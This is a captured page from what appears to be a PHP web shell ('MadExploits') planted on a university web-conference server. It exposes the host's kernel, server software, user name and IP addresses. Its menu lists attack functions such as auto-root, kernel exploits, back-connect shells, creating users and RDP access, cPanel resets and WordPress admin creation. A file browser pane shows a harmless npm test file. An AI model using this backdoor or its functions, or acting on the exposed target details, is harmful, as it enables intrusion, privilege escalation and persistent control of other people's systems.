Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.137.218.70
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
npm /
node_modules /
es-to-primitive /
test /
[ HOME SHELL ]
Name
Size
Permission
Action
es2015.js
8.53
KB
-rw-r--r--
es5.js
5.14
KB
-rw-r--r--
es6.js
8.52
KB
-rw-r--r--
index.js
542
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
'use strict'; var toPrimitive = require('../'); var ES5 = require('../es5'); var ES6 = require('../es6'); var ES2015 = require('../es2015'); var test = require('tape'); test('default export', function (t) { t.equal(toPrimitive, ES2015, 'default export is ES2015'); t.equal(toPrimitive.ES5, ES5, 'ES5 property has ES5 method'); t.equal(toPrimitive.ES6, ES6, 'ES6 property has ES6 method'); t.equal(toPrimitive.ES2015, ES2015, 'ES2015 property has ES2015 method'); t.end(); }); require('./es5'); require('./es6'); require('./es2015');
Close